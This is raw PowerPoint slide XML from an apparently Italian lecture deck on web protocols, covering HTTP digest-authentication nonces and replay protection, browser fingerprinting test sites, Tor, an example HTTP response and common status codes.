        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625ABB1A-C84E-4828-A3EA-3A56B2B1BBEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At this point the client may make another request, reusing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>server nonce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>value but providing a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>client nonce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cnonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For subsequent requests, the hexadecimal request counter (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) must be greater than the last value it used – otherwise an attacker could simply "replay" an old request with the same credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is up to the server to ensure that the counter increases for each of the nonce values that it has issued, rejecting any bad requests appropriately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server should remember nonce values that it has recently generated. It may also remember when each nonce value was issued, expiring them after a certain amount of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>he server does not need to keep any expired nonce values, but  it can simply assume that any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unrecognised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> values have expired.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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07E8B23-A547-47C2-A4B7-AA6DD168ACA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B250C319-9365-4F76-B189-60FF23BE267B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://panopticlick.eff.org/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.browserleaks.com/canvas</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://browserspy.dk/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>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CB4ADF0-3A06-4173-A7EE-DE40D7651E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>The TOR NETWORK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93542E13-8CD5-45CF-AF57-14838647FC7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="122884" name="Picture 2" descr="Image result for tor protocol onion routing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C12F405E-56F3-4FF5-9E84-81975C706D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789" y="1843088"/>
            <a:ext cx="8618537"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592B221-7775-4C89-94FF-F475F6B3B563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Response Message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6CC1A2D-DD6E-487B-A394-693847F96994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4705350" y="1987551"/>
            <a:ext cx="5822950" cy="283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2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Date: Thu, 06 Aug 1998 12:00:15 GMT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Server: Apache/1.3.0 (Unix) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Last-Modified: Mon, 22 Jun 1998 …... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length: 6821 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data data data data data ... </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{743D233E-A664-487F-991B-44D0A3841B2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2019301" y="1270000"/>
            <a:ext cx="2130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000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Status line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>(error code and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>sentence)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA54A85-DB3C-47B5-9FBA-450362F877E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3819526" y="1914526"/>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1510" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82106F9D-3B34-43F2-9557-5D64D12E1EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4619626" y="2349501"/>
            <a:ext cx="257175" cy="1858963"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 162"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 1428"/>
              <a:gd name="T2" fmla="*/ 0 w 162"/>
              <a:gd name="T3" fmla="*/ 0 h 1428"/>
              <a:gd name="T4" fmla="*/ 0 w 162"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 1428"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 162"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 1428"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 162"/>
              <a:gd name="T13" fmla="*/ 0 h 1428"/>
              <a:gd name="T14" fmla="*/ 162 w 162"/>
              <a:gd name="T15" fmla="*/ 1428 h 1428"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="162" h="1428">
                <a:moveTo>
                  <a:pt x="132" y="9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="1425"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">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it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21511" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9FD275C-7EE7-47F6-9E80-7AD6AF5AF398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3346450" y="3017838"/>
            <a:ext cx="1193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r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21512" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6ACAF2-AAB7-4E3C-8C41-EC4DFAF585C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3714751" y="4381501"/>
            <a:ext cx="923925" cy="257175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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1513" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C2DB204-113C-461A-8A80-EC55C1991708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1693863" y="4221164"/>
            <a:ext cx="240506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000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Data, e.g. a HTML </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin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AFD71E42-1219-41B5-914C-9FFFA6D424FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Error codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A3AD72-C96B-4FCA-97DB-FB5A6A2171CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057401" y="2314575"/>
            <a:ext cx="7934325" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>200 OK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t>request OK, object content follows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>301 Moved Permanently</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t>The requested object has been moved, find its new position in the “Location:” header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>400 Bad Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t>What the hell are you saying?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>404 Not Found</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000"/>
              <a:t>There is no object with such an URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>505 HTTP Version Not Supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
